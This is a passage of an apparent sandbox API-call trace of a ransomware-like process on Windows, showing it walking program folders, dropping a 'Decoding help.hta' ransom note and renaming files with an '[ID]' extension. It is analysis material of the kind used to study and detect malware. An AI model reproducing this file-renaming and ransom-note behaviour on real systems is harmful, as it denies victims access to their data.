Journal\\en-US\\jnwdui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\en-us\\jnwdui.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.291] FindNextFileW (in: hFindFile=0x5d8110, lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jnwmon.dll.mui", cAlternateFileName="")) returned 1 [0041.291] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.291] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" [0041.291] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\en-us\\decoding help.hta")) returned 0x1 [0041.291] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jnwmon.dll.mui") returned -1 [0041.291] lstrlenW (lpString="jnwmon.dll.mui") returned 14 [0041.291] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.291] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="jnwmon.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui" [0041.291] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui" [0041.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.291] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\jnwmon.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\en-us\\jnwmon.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.292] FindNextFileW (in: hFindFile=0x5d8110, lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x15000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Journal.exe.mui", cAlternateFileName="")) returned 1 [0041.292] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.292] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.292] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" [0041.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\en-us\\decoding help.hta")) returned 0x1 [0041.292] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Journal.exe.mui") returned -1 [0041.292] lstrlenW (lpString="Journal.exe.mui") returned 15 [0041.292] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.292] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.292] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="Journal.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui" [0041.292] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui" [0041.292] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.292] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui" (normalized: "c:\\program files\\windows journal\\en-us\\journal.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Journal.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\en-us\\journal.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.292] FindNextFileW (in: hFindFile=0x5d8110, lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSPVWCTL.DLL.mui", cAlternateFileName="")) returned 1 [0041.292] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.292] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.292] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" [0041.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\en-us\\decoding help.hta")) returned 0x1 [0041.292] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSPVWCTL.DLL.mui") returned -1 [0041.292] lstrlenW (lpString="MSPVWCTL.DLL.mui") returned 16 [0041.293] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.293] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="MSPVWCTL.DLL.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui" [0041.293] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui" [0041.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui" (normalized: "c:\\program files\\windows journal\\en-us\\mspvwctl.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\en-us\\mspvwctl.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.293] FindNextFileW (in: hFindFile=0x5d8110, lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="NBMapTIP.dll.mui", cAlternateFileName="")) returned 1 [0041.293] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.293] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" [0041.293] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\en-us\\decoding help.hta")) returned 0x1 [0041.293] lstrcmpiW (lpString1="Decoding help.hta", lpString2="NBMapTIP.dll.mui") returned -1 [0041.293] lstrlenW (lpString="NBMapTIP.dll.mui") returned 16 [0041.293] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.293] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="NBMapTIP.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui" [0041.293] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui" [0041.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.293] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\nbmaptip.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\en-us\\nbmaptip.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.293] FindNextFileW (in: hFindFile=0x5d8110, lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDIALOG.exe.mui", cAlternateFileName="")) returned 1 [0041.293] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.293] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.293] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" [0041.294] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\en-us\\decoding help.hta")) returned 0x1 [0041.294] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PDIALOG.exe.mui") returned -1 [0041.294] lstrlenW (lpString="PDIALOG.exe.mui") returned 15 [0041.294] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.294] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.294] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="PDIALOG.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui" [0041.294] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui" [0041.294] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.294] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui" (normalized: "c:\\program files\\windows journal\\en-us\\pdialog.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\en-us\\pdialog.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.296] FindNextFileW (in: hFindFile=0x5d8110, lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PDIALOG.exe.mui", cAlternateFileName="")) returned 0 [0041.296] FindClose (in: hFindFile=0x5d8110 | out: hFindFile=0x5d8110) returned 1 Thread: id = 252 os_tid = 0x998 [0040.607] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*", lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21ccca7f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b90 [0042.182] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.182] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ead9a68, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21ccca7f, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.182] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.182] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.182] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mpvis.dll.mui", cAlternateFileName="")) returned 1 [0042.183] lstrcpyW (in: lpString1=0x983a6a8, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.183] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.183] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" [0042.183] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\en-us\\decoding help.hta")) returned 0xffffffff [0042.183] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x588 [0042.250] WriteFile (in: hFile=0x588, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x8ccfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x8ccfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.251] CloseHandle (hObject=0x588) returned 1 [0042.251] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.251] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mpvis.dll.mui") returned -1 [0042.251] lstrlenW (lpString="mpvis.dll.mui") returned 13 [0042.251] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.251] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.251] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="mpvis.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\mpvis.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\mpvis.dll.mui" [0042.251] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\mpvis.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\mpvis.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\mpvis.dll.mui" [0042.251] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\mpvis.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\mpvis.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\mpvis.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0042.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\mpvis.dll.mui" (normalized: "c:\\program files\\windows media player\\en-us\\mpvis.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\mpvis.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\en-us\\mpvis.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.252] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfdc7162, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xdc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="setup_wm.exe.mui", cAlternateFileName="")) returned 1 [0042.252] lstrcpyW (in: lpString1=0x983a6a8, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.252] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.252] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" [0042.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\en-us\\decoding help.hta")) returned 0x1 [0042.252] lstrcmpiW (lpString1="Decoding help.hta", lpString2="setup_wm.exe.mui") returned -1 [0042.252] lstrlenW (lpString="setup_wm.exe.mui") returned 16 [0042.252] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*" [0042.252] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\*.*") returned 51 [0042.252] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\", lpString2="setup_wm.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\setup_wm.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\setup_wm.exe.mui" [0042.252] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\setup_wm.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\setup_wm.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\setup_wm.exe.mui" [0042.252] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\setup_wm.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\setup_wm.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\setup_wm.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0042.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\setup_wm.exe.mui" (normalized: "c:\\program files\\windows media player\\en-us\\setup_wm.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\en-US\\setup_wm.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\en-us\\setup_wm.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.252] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x8ccfd30 | out: lpFindFileData=0x8ccfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdc7162, 